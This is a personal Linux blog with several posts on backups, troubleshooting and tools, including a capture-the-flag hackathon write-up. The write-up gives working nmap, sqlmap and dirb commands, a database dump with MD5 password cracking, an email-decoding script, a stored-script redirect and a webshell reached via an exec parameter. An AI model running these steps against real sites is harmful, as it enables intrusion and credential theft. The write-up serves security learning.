Suramya's Blog : Welcome to my crazy life…

November 28, 2020

My Backup strategy and how it has evolved over the years

I am a firm believer in backing up my data, some people say that I am paranoid about backing up data and I do not dispute it. All my data is backed up on multiple drives and locations and still I feel that I need additional backup. This is because I read the news and there have been multiple cases where people lost their data because they hadn’t backed it up. Initially I wasn’t that serious about it but when I was in college and working at the helpdesk, a phd student came in crying because her entire PHD thesis was on a Zip Drive and it wasn’t working anymore. She didn’t have a backup and was basically screwed. We tried a bunch of stuff to recover the data but didn’t manage to recover anything. That made me realize that I needed a better backup procedure so started my journey in creating recoverable backups.

My first backup system was a partition on my drive called backup where I created a copy of all my important data (This is back in 2000/2001). Then I realized that if the drive died then I would loose access to the backup partition as well, and I started looking for alternatives. This is around the time when I had bought a CD Writer so all my important data was backed up to CD’s and I was confident that I could recover any lost data. Shortly afterwards I moved to DVD’s for easier storage. However, I didn’t realize till a lot later that CD’s & DVD’s start becoming unreadable quite easily. Thankfully I didn’t loose any data but it was a rude awakening to find that the disks I had expected to keep my data safe were starting to become unreadable within a few years.

I then did a bunch of research online and found that the best medium for storing data long term is still Hard Drives. I didn’t want to store anything online because I want my data to be in my control so any online backup system was out of the question. I added multiple drives to my desktop and started syncing the data from the desktop & laptop to the backup drive using rync. This ensured that the important data was in three locations at any given time: My Desktop, My Laptop and the Backup drive. (Plus a DVD copy that I made of all my data every year)

I continued with this backup strategy for a few years but then realized that I had no way to go back to a previous version of any given document, if I deleted a file or wanted to go back to an older version of a file I only had 24 hours before the changes were synced to the backup drive before it was unrecoverable. There was a case where I ended up having to dig through my DVD backups to find the original version of a file that I had changed. So I did a bit of research and found rdiff-backup. It allows a user to back up one directory to another and generates an incremental backup. So we can recover/restore files based on date range. The best part is that the software is highly efficient, once the initial backup is done it only transmits the changes to the files in subsequent runs. Now that I have been using it I can restore a snapshot of my data going back to 2012 quite easily.

I was quite happy with this setup for a while, but while reading an article on best backup practices I realized that I was still depending only on 1 location for the backup data (the rdiff-data snapshots) and the best practices stated that you should also store it in an external drive or offsite location to prevent viruses/ransomware from deleting backups. So I bought a 5TB external drive and created an encrypted partition on the same to store all my important data. But I was still unhappy because all of this was still stored at my home so if I had a fire or something I would still end up loosing the data even though my external drive was kept in a safe. I still didn’t want to store data online but that was still the best way to ensure I had offsite backup. I initially thought about setting a server at my parents place in Delhi and backup there but that didn’t work out for various reasons. Plus I didn’t want to have to call them and troubleshoot backup issues over the phone.

Around this time I was reading about encrypted partitions and came up with the idea of creating an encrypted container file to store my data and then backup the container file online. I followed the steps I outlined in my post How to encrypt your Hard-drive in Linux and created the encrypted container. Once I finished that I had to upload the container to my webhost since I had unlimited storage space as per my contract. Initially I wasn’t able to because they had restricted my account’s quota but a call to their customer support sorted it out after a bit of argument and explaining what I was doing. The next hurdle I faced was uploading the file to the server because of the ridiculously low upload speed I was getting from Airtel. I had a 40 mbps connection at the time but the upload speed was restricted to 1 mbps because of ‘reasons’. After arguing with their support for a while, I was complaining about it at work and one of the folks suggest I check out ACT Internet. I checked out their plans and was quite impressed with the offerings so I switched over to ACT and was able to upload the container file quickly and painlessly.

Once the container was uploaded, I had to tackle the next problem in the process which was on how to update the files in the container without having to upload the entire container to the host. I experimented with a few solutions and then came up with the following solution:

1. Mount the remote partition as a local mount using sshfs. I mounted the partition locally using the following command: (please replace with the correct hostname and username before using)

/usr/sbin/runuser -l suramya -c "sshfs -o allow_other @hostname.com:. /mnt/offsite/"

2. Once the remote partition was mounted locally, I was able to use the usual commands to mount the encrypted partition to another location using the following command:

/usr/sbin/cryptsetup luksOpen /mnt/offsite/container/Enc_vol1.img enc --key-file /root/UserKey.dat
mount /dev/mapper/enc /mnt/stash/

In an earlier iteration of the code I wasn’t using the keyfile so had to manually enter the password everytime I wanted to backup to the offsite location. This meant that the backup was done randomly as and when I remembered to run the command manually. A few days ago I finally configured it to run automatically after adding the keyfile as a decryption key. (Obviously the keyfile should be protected and not be accessible to others because it allows users to decrypt the data without entering a password.) Now the offsite backup runs once a week while the local backup runs daily and I still backup the Backup partition to the external drive as well manually as and when I remember to do so.

In all I was quite happy with my setup but then I was updating the encrypted container and a network issue made be believe that my remote container had become corrupted (it wasn’t but I thought it was). At the same time I was fooling around with Microsoft One Drive and saw that I had 1TB of storage available over there since I was a Office 365 subscriber. This gave me the idea of backing up the Container to OneDrive as well as my site hosting.

I first tried copying the entire container to the drive and hit a limit because the file was too large. So I thought I would split the file into 5GB parts and then sync them to OneDrive using rclone. After installing rclone. I configured it to connect to OneDrive by issuing the following command and following the onscreen prompts:

rclone config

I then created a folder on OnDrive called container to store the split files and then tried uploading a test file using the command:

rclone copy $file OneDrive:container

Where OneDrive is the name of my provider that I configured in the previous step. This was successful so I just needed to create a script that did the following:

1. Update the Container file with the latest backup
2. Split the Container file into 5GB pieces using the following command:

split --verbose -d -b5GB /mnt/repository/Container/Enc_vol1.img /mnt/repository/Container/Enc_vol_

3. Upload the pieces to Ondrive.

for file in `ls /mnt/repository/Container/Enc_vol_* |sort`; do  echo "$file";  /usr/bin/rclone copy $file OneDrive:container -v &> /tmp/oneDriveSync.log; done

This command uploads the pieces to the drive one at a time and is a bit slow because it maxes out the upload speed to ~2mbps. If you split the uploads and run the command in parallel then you get a lot faster speed. Keep in mind that if you are uploading more than 10 files at a time you will start getting errors about too many open connections and then you have to wait for a few hours before you can upload again. It took a while to upload the chunks but now my files are stored in yet another location and the system is configured to sync to Onedrive once a month.

So, as of now my files are backed up as following:

  • /mnt/Backup: Local Drive. All changes are backed up daily using rdiff-backup
  • /mnt/offsite: Encrypted Container stored online. All changes are backed up weekly using rsync
  • OneDrive: Encrypted Container stored at Microsoft OneDrive. All changes are backed up monthly using rsync
  • External Drive: Encrypted backup stored in an External Hard-drive using rsync. Changes are backed up infrequently manually.
  • Laptop: All Important files are copied over to the laptop using Unison/rsync manually so that I can access my data while traveling

Finally, I am also considering backing up the snapshot data to BlueRay disks but it will take time so haven’t gotten around to it yet.

Since I have this elaborate backup procedure I wasn’t worried much when one of my disks died last week and was able to continue work without issues or worries about loosing data. I still think I can enhance the backups I take but for now I am good. If you are interested in my backup script an extract of the code is listed below:

function check_failure ()
{
	if [ $? == 0 ]; then
		logger "INFO: $1 Succeeded"
	else
		logger "FATAL: Execution of $1 failed"
		wall "FATAL: Execution of $1 failed"
		exit 1
	fi
}

###
# Syncing to internal Backup Drive
###

function local_backup ()
{
	export BACKUP_ROOT=/mnt/Backup/Snapshots
	export PARENT_ROOT=/mnt/repository

	logger "INFO: Starting System Backup"

	rdiff-backup -v 5 /mnt/data/Documents/ $BACKUP_ROOT/Documents/
	check_failure "Backing up Documents"

	rdiff-backup -v 5 /mnt/repository/Documents/Jani/ $BACKUP_ROOT/Jani_Documents/
	check_failure "Backing up Jani Documents"

	rdiff-backup -v 5 $PARENT_ROOT/Programs/ $BACKUP_ROOT/Programs/
	check_failure "Backing up Programs"

	..
	..

	logger "INFO: All Backups Completed Successfully."
}

### 
# Syncing to Off-Site Backup location
###

function offsite_backup
{
	export PARENT_ROOT=/mnt/repository

	# First we mount the remote directory to local
	logger "INFO: Mounting External Drive"
	/usr/sbin/runuser -l suramya -c "sshfs -o allow_other username@remotehost:. /mnt/offsite/"
	check_failure "Mounting External Drive"

	# Open the Encrypted Partition
	logger "INFO: Opening Encrypted Partition. Please provide password."
	/usr/sbin/cryptsetup luksOpen /mnt/offsite/container/Enc_vol1.img enc --key-file /root/keyfile1
	check_failure "Mounting Encrypted Partition Part 1"

	# Mount the device
	logger "INFO: Mounting the drive"
	mount /dev/mapper/enc /mnt/stash/
	check_failure "Mounting Encrypted Partition Part 2"

	logger "INFO: Starting System Backup"
	rsync -avz --delete  /mnt/data/Documents /mnt/stash/
	check_failure "Backing up Documents offsite"
	rsync -avz --delete /mnt/repository/Documents/Jani/ /mnt/stash/Jani_Documents/
	check_failure "Backing up Jani Documents offsite"
	..
	..
	..

	umount /mnt/stash/
	/usr/sbin/cryptsetup luksClose enc
	umount /mnt/offsite/

	logger "INFO: Offsite Backup Completed"
}

This is how I make sure my data is backed up. All of Jani’s data is also backed up to my system using robocopy as she is running Windows and then the data gets backed up by the scripts I explained above as usual. I also have scripts to backup my website/blog/databases but that’s done using a simple script. Let me know if you are interested and I will share them as well.

This is all for now. Let me know if you have any questions about the backup strategy or if you want to make fun of me. 🙂 This is all for now. Will write more later.

– Suramya

September 30, 2020

How to fix vlc’s Core dumping issue while playing some videos

Over the past 2 days I found that the VLC install on my computer was suddenly having issues playing some of the video files on my computer. Initially I thought that it was a problem with the video file, then I realized that this was also happening with videos that had be playing fine earlier. When I ran vlc from the command line to play the problem video it gave the following output on screen when it crashed:

[00005587b42751b0] dummy interface: using the dummy interface module…
[00007f00c4004980] egl_x11 gl error: cannot select OpenGL API
[00007f00c4004980] gl gl: Initialized libplacebo v2.72.0 (API v72)
[00007f00c402a310] postproc filter error: Unsupported input chroma (VAOP)
[00007f00bd986e50] chain filter error: Too high level of recursion (3)
[00007f00c4028d40] main filter error: Failed to create video converter
[00007f00bd986e50] chain filter error: Too high level of recursion (3)
[00007f00c4028d40] main filter error: Failed to create video converter
[00007f00bd986e50] chain filter error: Too high level of recursion (3)
[00007f00c4028d40] main filter error: Failed to create video converter
[00007f00bd986e50] chain filter error: Too high level of recursion (3)


[00007f00c44265c0] chain filter error: Too high level of recursion (3)
[00007f00c4414240] main filter error: Failed to create video converter
[00007f00bd9020d0] main filter error: Failed to create video converter
[00007f00cc047d70] main video output error: Failed to create video converter
[00007f00cc047d70] main video output error: Failed to compensate for the format changes, removing all filters
[00007f00c4004980] gl gl: Initialized libplacebo v2.72.0 (API v72)

A google search told me that a possible solution was to disable hardware acceleration in the Video settings but that didn’t fix my problem. So I took a look at the kernel.log file in /var/log and I got the following error when the program crashed:

Sep 30 21:11:44 StarKnight kernel: [173399.132554] vlc[91472]: segfault at 28000000204 ip 00007f2d8916c1d8 sp 00007f2d8aa69db0 error 4 in libpostproc.so.55.7.100[7f2d8915c000+1d000]
Sep 30 21:11:44 StarKnight kernel: [173399.132568] Code: 98 48 8d 44 07 20 0f 18 08 8b 44 24 08 4d 8d 0c 1a 4d 8d 04 2b 85 c0 0f 85 cb fd ff ff 4c 8b 6c 24 28 4b 8d 04 29 4b 8d 14 20 <41> 0f 6f 01 43 0f 6f 0c 29 41 0f 7f 00 43 0f 7f 0c 20 43 0f 6f 04

Spent about an hour searching for the solution using the details from the kernel.log but got nowhere. Finally I found a forum post where one of the solutions offered was to remove the vlc configuration files, since I didn’t have any other bright idea’s I renamed the vlc config folder by issuing the following command:

mv ~/.config/vlc ~/.config/vlc_09302020

Then I started vlc and just like that everything started working again. 🙂 Not sure what caused the settings to get borked in the first place but the issue is fixed now so all is well.

– Suramya

September 29, 2020

Mounting a Network drive over ssh in Windows using WinFsp & SSHFS-Win

I have computers running both Windows & Linux and at times I need to share files between them and I have been looking for a convenient way to access the files from my Linux machine from my Windows machine without having to run SAMBA on the Linux. This is because historically SAMBA has been a security nightmare and I don’t want to run extra services on the computer if I can avoid it. Earlier this week I finally found a way to mount my Linux directories on Windows as a network mount over SSH using WinFsp & SSHFS-Win and I have been running it for a couple of days so far without any issues. (So far)

Follow these steps to enable SSHFS-Win on your windows machine:

Install WinFsp (Windows File System Proxy)

WinFsp is a set of software components for Windows computers that allows the creation of user mode file systems similar to FUSE (Filesystem in Userspace) in the Unix/Linux world. You can download it from the project’s GIT repository. The Installation file is available by clicking on the download link under ‘Releases’ near the top right corner of the page. The latest version is WinFsp 2020.1 at the time of this writing.

You install the software by running the MSI file you downloaded and the default options worked for me without modification.

Install SSHFS For Windows

SSHFS-Win is a minimal port of SSHFS to Windows. It is available for download from the project’s Git repository. You can compile from source or download the installation file by clicking on the download link under ‘Releases’ near the top right corner of the page. The latest version is SSHFS-Win 2020 at the time of this writing.

Please note that you will need to have WinFsp installed already before you can install SSHFS-Win successfully.

Usage:

Once you have installed both the software you can start using them and map a network drive to a directory using Windows Explorer or the net use command. Instructions for use are as below (Taken from the project Documentation):

In Windows Explorer select This PC > Map Network Drive and enter the desired drive letter and SSHFS path using the following UNC syntax:

\\sshfs\REMUSER@HOST[\PATH]

The first time you map a particular SSHFS path you will be prompted for the SSH username and password which can be saved using the Windows Credential Manager so that you don’t get prompted for it again. In order to unmap the drive, right-click on the drive icon in Windows Explorer and select Disconnect.


Visual demo of how to Map a Network drive using SSHFS-Win

You can map a network drive from the command line as well using the net use command:

net use X: \\sshfs\suramya@StarKnight

You will then be prompted for the password and once you authenticate you can use the new drive as usual. You can unmap the drive as follows:

net use X: /delete

I find this quite useful and hope you do as well.

Thanks to MakerLab, Department of Computer Science, HKU for pointing me in the correct direction

– Suramya

September 27, 2020

Using ncdu to Check Disk Space Usage In Linux

One of the common tasks I face on my Linux system is to identify what files/directories are using the most space. The traditional way to find out is to go to the top level directory and run a ‘du -hs *’ (without the quotes) on the directory and then cd into each directory, rinse and repeat. The other option available is to right click on the folder in Dolphin or any other file manager and select Properties. With the same process as before when you go into each directory individually, right click and get the properties. This is very tedious and time consuming.

Instead you can use ncdu (NCurses Disk Usage) for looking at the storage space utilization on your computer as it has a lot of advantages. It is designed to find space hogs on a remote server where you don’t have an entire graphical setup available. It is fast, simple and very easy to use. I have been using it for a while now and absolutely love it.

To Install ncdu on a Debian system, you can issue the following command:

apt-get install ncdu

Once you have it installed, the usage it very simple. Simply open a command prompt and issue the following command:

ncdu

It will start in the current directory and index all the sub-directories under it. The initial scan can take a while depending on the size of the directories under the current directory. But its comparable to the time taken when running du -hs on the directory. Once the program completes its scan, you get a simple ncurses based interface that you can navigate using the keyboard.


ncdu display for my home directory

All directories & are listed with their sizes in human readable format sorted by size with the largest files & directories at the top (in the default view). You can go into a directory by selecting it and hitting enter. The sizes for the subdirectory are immediately shown without having to run additional commands. You can also delete directories & files from within ncdu by hitting the delete key which is a huge timesaver.

If you haven’t tried it out do check it out. You will love it.

– Suramya

August 30, 2020

How to write using inclusive language with the help of Microsoft Word

Filed under: Computer Software,Knowledgebase,My Thoughts,Tech Related — Suramya @ 11:59 PM

One of the key aspects of Inclusion is Inclusive language, and its very easy to use non-inclusive/gender specific language in our everyday writings. For example, when you meet a mixed gender group of people almost everyone will say something to the effect of ‘Hey Guys’. I was guilty of the same and it took a concentrated effort on my part to change my greeting to ‘Hey Folks’ and other similar changes. Its the same case with written communication and most people default to male gender focused writing. Recently I found out that Microsoft Office‘s correction tools, which most might associate with bad grammar or improper verb usage, secretly have options that help catch non-inclusive language, including gender and sexuality bias. So I wanted to share it with everyone.

Below are instructions on how to find & enable the settings:

  • Open MS Word
  • Click on File -> Options
  • Select ‘Proofing’ from the menu in the left corner and then scroll down on the right side to ‘Writing Style’ and click on the ‘Settings’ button.
  • Scroll down to the “Inclusiveness” section, select all of the checkboxes that you want Word to check for in your documents, and click the “OK” button. In some versions of Word you will need to scroll down to the ‘Inclusive Language’ section (its all the way near the bottom) and check the ‘Gender-Specific Language’ box instead.
  • Click Ok

It doesn’t sound like a big deal when you refer to someone by the wrong gender but trust me its a big deal. If you don’t believe me try addressing a group of men as ‘Hello Ladies’ and then wait for the reactions. If you can’t address a group of guys as ladies then you shouldn’t refer to a group of ladies as guys either. I think it is common courtesy and requires minimal effort over the long term (Initially things will feel a bit awkward but then you get used to it).

Well this is all for now. Will write more later.

– Suramya

August 24, 2018

Fixing the appstreamcli error when running apt-get update

Filed under: Computer Software,Knowledgebase,Linux/Unix Related,Tech Related — Suramya @ 12:05 AM

Over the past few days everytime I tried to update my Debian system using apt-get it would fail with the following error message:

(appstreamcli:5574): GLib-CRITICAL **: 20:49:46.436: g_variant_builder_end: assertion '!GVSB(builder)->uniform_item_types || 
GVSB(builder)->prev_item_type != NULL || g_variant_type_is_definite (GVSB(builder)->type)' failed

(appstreamcli:5574): GLib-CRITICAL **: 20:49:46.436: g_variant_new_variant: assertion 'value != NULL' failed

(appstreamcli:5574): GLib-ERROR **: 20:49:46.436: g_variant_new_parsed: 11-13:invalid GVariant format string
Trace/breakpoint trap
Reading package lists... Done
E: Problem executing scripts APT::Update::Post-Invoke-Success 'if /usr/bin/test -w /var/cache/app-info -a -e /usr/bin/appstreamcli; then appstreamcli refresh-cache > 
/dev/null; fi'
E: Sub-process returned an error code

Spent a couple of hours trying to figure out what was causing it and was able to identify that it was caused because of a bug in appstream as tunning the command manually also failed with the same error. When I tried to remove the package as recommended by a few sites it would have removed the entire KDE desktop from my machine which I didn’t want so I was at a loss as to how to fix the problem. So I put the update on hold till I had a bit more time to research the issue and identify the solution.

Today I got some free time and decided to try again and after a little bit of searching stumbled upon the following Bug Report (#906544) where David explained that the error was caused due to a bug in the upstream version of appstream and a little while later Matthias commented that the issue is fixed in the latest version of the software and it would flow down to the Debian repositories in a little bit. Normally I would have just done an apt-get update and then install to get the latest package but since the whole issue was that I couldn’t get the system to finish the update command I had to manually install the package.

To do that I went to the Debian site and opened the software package list for Debian Unstable (as that is what I am using) and searched for appstream. This gave me a link to the updated package (0.12.2-2) that fixed the bug (I had 0.12.2-1 installed). Once I downloaded the package (Make sure you download the correct package based on your system architecture) I manually installed it using the following command as root:

dpkg -i appstream_0.12.2-2_amd64.deb

This installed the package and I was then able to do an apt-get update successfully. I still get the GLib-CRITICAL warnings but that apparently can be ignored without issues.

Hope this helps people who hit the same issue (or reminds me of the solution if/when I hit the issue again).

– Suramya

February 7, 2018

Hacking the Brainwaves Cyber Security CTF Hackathon 2018

Earlier this year I took part in the Brainwaves Cyber Security Hackathon 2018 with Disha Agarwala and it was a great experience. We both learnt a lot from the hackathon and in this post I will talk about how we approached the problems and some of our learning’s from the session.

Questions we had to answer/solve in the Hackathon:

  • Find the Webserver’s version and the Operating system on the box
  • Find what processes are running on the server?
  • What fuzzy port is the SSH server running on?
  • Discover the site architecture and layout.
  • Describe the major vulnerability in the home page of the given website based on OWASP TOP 1. Portal Url: https://socgen-ctf.0x10.info
  • Gain access to member area and admin area through blind sql, or session management.
  • Dump all user account from member area. [SQLi]
  • [Broken Validation] Demonstrate how you can modify the limit in order management.
  • [Open Redirect] Redirect site/page to hackerearth.com
  • List any other common bug came across while on the site
    • After logging into the member area, perform the following functions:
    • Find the master hash & crack it
    • Dump all user’s
    • Find the email ID and password of saved users

Information Gathering:

In order to find the services running on the server, the first thing we had to do was find the IP/hostname of the actual server hosting the site which was a bit tricky because the URL provided is protected by CloudFlare. So, any scans of socgen-ctf.0x10.info took us to the CloudFlare proxy server instead of the actual server which was a problem.

We figured this out by trying to access the IP address that socgen-ctf.0x10.info translated to in the browser.

suramya@gallifrey:~$ host socgen-ctf.0x10.info 
socgen-ctf.0x10.info has address 104.28.15.64 

Since the site homepage didn’t do anything except display text that refreshed every 15 seconds we needed to find other pages in the site to give us an a attack surface. We checked to see if the site had a robots.txt (It tells web crawlers not to index certain directories). These directories are usually ones that have sensitive data and in this case the file existed with the following contents:

# robots.txt
Sitemap: http://socgen-ctf.0x10.info/sitemap.xml
User-agent: *
Disallow: images
Disallow: /common/
Disallow: /cgi-bin/

The images directory didn’t have any interesting files in it but the /common/ directory on the other hand had a file named embed.php in it which basically ran a PHP Info dump. This dump has a lot of information that can be used to attack the site but the main item we found here was the IP address of the actual server where the services were running (38.109.218.93).

Using this information we were able to initiate a nmap scan to get the services running on the site. The nmap command that gave us all the information we needed was:

nmap -sV -O -sS -T4 -p 1-65535 -v 38.109.218.93

This gave us the following result set after a really really long run time:

PORT     STATE    SERVICE       VERSION
23/tcp   filtered telnet
25/tcp   open     smtp?
80/tcp   open     http          This is not* a web server, look for ssh banner
81/tcp   open     http          nginx 1.4.6 (Ubuntu)
82/tcp   open     http          nginx 1.4.6 (Ubuntu)
137/tcp  filtered netbios-ns
138/tcp  filtered netbios-dgm
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
497/tcp  filtered retrospect
1024/tcp open     kdm?
1720/tcp open     h323q931?
2220/tcp open     ssh           OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
2376/tcp open     ssl/docker?
3380/tcp open     sns-channels?
3389/tcp open     ms-wbt-server xrdp
5060/tcp filtered sip
5554/tcp filtered sgi-esphttp
8000/tcp open     http          nginx 1.4.6 (Ubuntu)
8080/tcp open     http          Jetty 9.4.z-SNAPSHOT
8086/tcp open     http          nginx 1.10.3 (Ubuntu)
9090/tcp open     http          Transmission BitTorrent management httpd (unauthorized)
9996/tcp filtered palace-5
19733/tcp filtered unknown
25222/tcp filtered unknown
30316/tcp filtered unknown
33389/tcp open     ms-wbt-server xrdp
33465/tcp filtered unknown
34532/tcp filtered unknown
35761/tcp filtered unknown
35812/tcp filtered unknown
35951/tcp filtered unknown
37679/tcp filtered unknown
38289/tcp filtered unknown
38405/tcp filtered unknown
38995/tcp filtered unknown
40314/tcp filtered unknown
44194/tcp filtered unknown
47808/tcp filtered bacnet

For some reason the results from the nmap scan varied so we had to run the scan multiple times to get all the services on the host. This was possibility because the server was setup to make automated scanning more difficult.

Once we identified the port where the SSH server was running on (2220) we were able to connect to the port and that gave us the exact OS Details of the server. We did already know that the server was running Ubuntu along with the kernel version from the PHP Info dump but this gave us the exact version.

Discovering Site architecture:

Since we had to discover the URL to the members & admin area before we could attack it, we used dirb which is a Web Content Scanner to get the list ofall the public directories/files on the site. This gave us the URL’s to several interesting files and directories. One of the files identified by dirb was https://socgen-ctf.0x10.info/sitemap.xml. When we visited the link it gave us a list of other URL’s on the site of interest (we had to replace the hostname to socgen-ctf.0x10.info) including the members area (http://socgen-ctf.0x10.info/members.php?p=login) and siteadmin (http://socgen-ctf.0x10.info/siteadmin).

After a long and fruitless effort to use SQL Injection on the siteadmin area we started to explore the other files/URL’s identified by dirb. This gave us a whole bunch of files/data that seem to be left over from other hackathons so we ignored them.

SQL Injection

The main site https://socgen-ctf.0x10.info/index.php?p=. appeared to be vulnerable to SQL at the first glance because when we visit https://socgen-ctf.0x10.info/index.php?p=.’ (note the trailing single quote) it reloads the page. This meant that we could write queries to it however since it didn’t display a true or false on the page a SQL injection wasn’t easily possible. (We could have tried a blind injection but that would require a lot of effort for a non-guaranteed result.

As we explored the remaining URL’s in sitemap.xml one of the links (https://socgen-ctf.0x10.info/embedframe.php) was interesting as it appeared to give a dump of data being read from the site DB. Opening the site while watching the Developer Toolbar for network traffic identified a URL that appeared to be vulnerable to SQL injection (https://socgen-ctf.0x10.info/ajax.php?cid=&p=view_channel&id=28) and once we tested the url we found that the variable id was indeed vulnerable to injection.

We used blind sql to gain access by executing true and false statements and see that it returns different results for true(displays ‘1’ on the webpage) and false (displays 0) . We checked whether a UNION query runs on the site which it did and using other queries we identified the DB backend to be a mysql database (5.xx.xxx version). Then we found out the table name (members) which was an easy guess since the website had an add customer field. After identifying the number of columns in the table we got stuck because any statements to list the available tables or extract data were failing with an error about inconsistent column numbers.

Finally, we ran sqlmap which is an open source tool for automating SQL injection. It took us a few tries to get the software running because initially any attempt to scan the site was rejected with a 403 error message. Turns out that the connections were being rejected because the site didn’t like the useragent the software was sending by default and adding a flag to randomize the useragent resolved the permission denied issue.

Once the scan ran successfully we tried to get access to the MySQL usertable but that failed because the user we were authenticating as to the MySQL server didn’t have access to the table required.

sqlmap -u 'https://socgen-ctf.0x10.info/ajax.php?cid=&p=view_channel&id=28' --random-agent -p id --passwords

So, then we tried getting an interactive shell and an OOB shell both of which failed. We finally ran the command to do a full dump of everything that the system allowed us to export using SQL injection via SQLMap. This included the DB schema, table schema’s and a dump of every table on the database server which the mysql user had access to. The command we used is the following:

sqlmap -u 'https://socgen-ctf.0x10.info/ajax.php?cid=&p=view_channel&id=28' --random-agent -p id  --all --threads 3

This gave us a full dump of all the tables and the software was helpful enough to identify password hashes when they existed in the table and offered to attempt decryption as well. In this case the password was encrypted with a basic unsalted MD5 hash which was cracked quite easily. Giving us the password for the first two accounts in the database (admin & demo).

Looking at the rest of the entries in the users table we noticed that they all had funny values in the email address field, instead of a regular email address we had entries that looked like the following:

,,,"0000-00-00 00:00:[email protected]509a6f75849b",1
,1,RU,

As we had no clue what this was about the first thing we attempted was to access the
https://socgen-ctf.0x10.info/cdn-cgi/l/email-protection URL. This URL gave us a message that told us that the email addresses in the DB were obfuscated by CloudFlare to protect them from Bots. A quick Google search gave us a 21 line python script which we tweaked to convert all the hash to email address and passwords. (The code is listed below for reference)

#! /usr/bin/env python 
# -*- coding: utf-8 -*- 
# vim:fenc=utf-8 
# 
# Copyright © 2016 xl7dev  
# Distributed under terms of the MIT license. 

""" 

""" 
import sys 
import re 
fp = sys.argv[1] 
def deCFEmail(): 
   r = int(fp[:2],16) 
   email = ''.join([chr(int(fp[i:i+2], 16) ^ r) for i in range(2, len(fp), 2)]) 
   print email 
if __name__ == "__main__":                                                                                                                                                                       
   deCFEmail() 

This gave us the email addresses and passwords for all the users on the site. Since the accounts appeared to be created by SQL injection a bunch of them didn’t have any passwords but the remaining were valid accounts for the most part and we verified a couple by logging in manually with the credentials.

OWASP TOP 10 Vulnerability

To find the vulnerabilities in the home page we tried various manual techniques at first but drew a blank so we decided to use the owasp-zap. This tool allows you to automatically scan for vulnerabilities in a given URL along with a whole other stuff.

At first the scan failed because of the same issue as earlier with the user-agent. This time we took a different approach to resolve the issue by configuring owasp-zap as a proxy server and configuring Firefox traffic to use this proxy server for all traffic. This gave us the site in the software and we were then able to trigger both an active scan and spider scan of the site.

This gave us detailed reports that highlighted various issues in the site which we submitted.

Redirecting HomePage

The redirection of the home page was quite simple. We tried inserting a customer name with javascript tags in it and were able to do so successfully. So we inserted the following into the DB and the system automatically redirected the page when the Customer list section was accessed.

Other Interesting Finds

The nmap scan told us that in addition to port 80 a web server was listening on ports 81, 82, 8000, 8080 and 8086.

Ports 82, 8000 and 8086 were running standard installs of nginx and we didn’t find much of interest at these ports even after we ran dirb on all of them. Port 8080 appeared to be running a proxy or a Jenkins instance.

Port 81 was the most interesting because it was running a nginx server that responded to any queries with a 403 error. When we tried accessing the site via the browser we got an error about corrupted content.

We were unable to identify what the purpose of this site was but it was interesting.

SSH Banner / PHP Shell

The webserver instance running on port 80 had the version set to the following text “This is not* a web server, look for ssh banner Server at private-tunel.wehostservers.ru Port 80” so we went back and investigated the SSH Banner from the ssh server on port 2220. The banner was encrypted and to decrypt the SSH banner, we continuously converted the cipherText from its hex value to ASCII value . It gave us the following results on each conversion

3333333733333333333333373333333333333336333333383333333233333330333333363333333233333336333333313333333633363335333333363336333533333336333333353
3333337333333323333333233333330333333363333333633333336333633363333333733333332333333373333333733333336333333313333333733333332333333363333333433333332333333303333
3337333333333333333633363333333333363333333133333337333333333333333633333338333333323333333033333336333333333333333633363336333333373333333533333336333633333333333
63333333433333332333333303333333633363333333333363333333533333336333333313333333633333334333733393336363633373335373436663230363132307368336c6c2e706870

3337333333373333333633383332333033363332333633313336363533363635333633353337333233323330333633363336363633373332333733373336333133373332333633343332333033373333333
636333336333133373333333633383332333033363333333636363337333533363633333633343332333033363633333633353336333133363334373936663735746f206120sh3ll.php
 37333733363832303632363136653665363537323230363636663732373736313732363432303733366336313733363832303633366637353663363432303663363536313634796f75to a #

ssh banner forward slash could lead you to a #sh3ll.php

Once we got the full decrypted text we knew that there was a potential webshell on the server but it wasn’t apparent where the shell was located. After hit and try failed we turned back to our old faithful dirb to see if it could find the shell.

dirb allows us to specify a custom word list which is used to iterate through the paths and we can also append an extension to each of the words to search for, so we created a file called test with the following content:

suramya@gallifrey:~$ cat test 
shell
sh3ll
sh311

and then ran the following command:

suramya@gallifrey:~$ dirb https://socgen-ctf.0x10.info/ test  -X '.php'

This gave us the location of the shell.


Accessing the link gave us a page with a message “you found a shell, try pinging google via sh3ll.php?exec=ping 8.8.8.8”

Accessing the URL with the additional parameter gave us a page with the following output:

September 27, 2016

How to install Tomato Firmware on Asus RT-N53 Router

Filed under: Computer Software,Knowledgebase,Tech Related,Tutorials — Suramya @ 11:43 PM

I know I am supposed to blog about the all the trips I took but wanted to get this down before I forget what I did to get the install working. I will post about the trips soon. I promise 🙂

Installing an alternate firmware on my router is something I have been meaning to do for a few years now but never really had the incentive to investigate in detail as the default firmware worked fine for the most part and I didn’t really miss any of the special features I would have gotten with the new firmware.

Yesterday my router decided to start acting funny, basically every time I started transferring large files from my phone to the desktop via sFTP over wifi the entire router would crash after about a min or so. This is something that hasn’t happened before and I have transferred gigs of data so I was stumped. Luckily I had a spare router lying around thanks to dad who forced me to carry it to Bangalore during my last visit. So I swapped the old router with the new one and got my work done. This gave me an opportunity as I had a spare router sitting on my desk and some time to kill so I decided to install a custom firmware on it to play with it.

I was initially planning on installing dd-wrt on it but their site was refusing to let me download the file for the RT-N53 model even though the wiki said that I should be able to install it. A quick web search suggested that folks have had a good experience with the Tomato by Shibby firmware so I downloaded and installed it by following these steps:

Download the firmware file

First we need to download the firmware file from the Tomato Download site.

  • Visit the Tomato download Section
  • Click on the latest Build folder. (I used build5x-138-MultiWAN)
  • Click on ‘Asus RT-Nxx’ folder
  • Download the ‘MAX’ zip file as that has all the functionality. (I used the tomato-K26-1.28.RT-N5x-MIPSR2-138-Max.zip file.)
  • Save the file locally
  • Extract the ZIP file. The file we are interested in is under the ‘image’ folder with a .trx extension

Restart the Router in Maintenance mode

  • Turn off power to router
  • Turn the power back on while holding down the reset button
  • Keep holding reset until the power light starts flashing which will mean router is in recovery mode

Set a Static IP on the Ethernet adapter of your computer

For some reason, you need to set the IP address of the computer you are using to a static IP of 192.168.1.2 with subnet 255.255.255.0 and gateway 192.168.1.1. If you skip this step then the firmware upload fails with an integrity check error.

Upload the new firmware

  • Connect the router to a computer using a LAN cable
  • Visit 192.168.1.1
  • Login as admin/admin
  • Click Advanced Setting from the navigation menu at the left side of your screen.
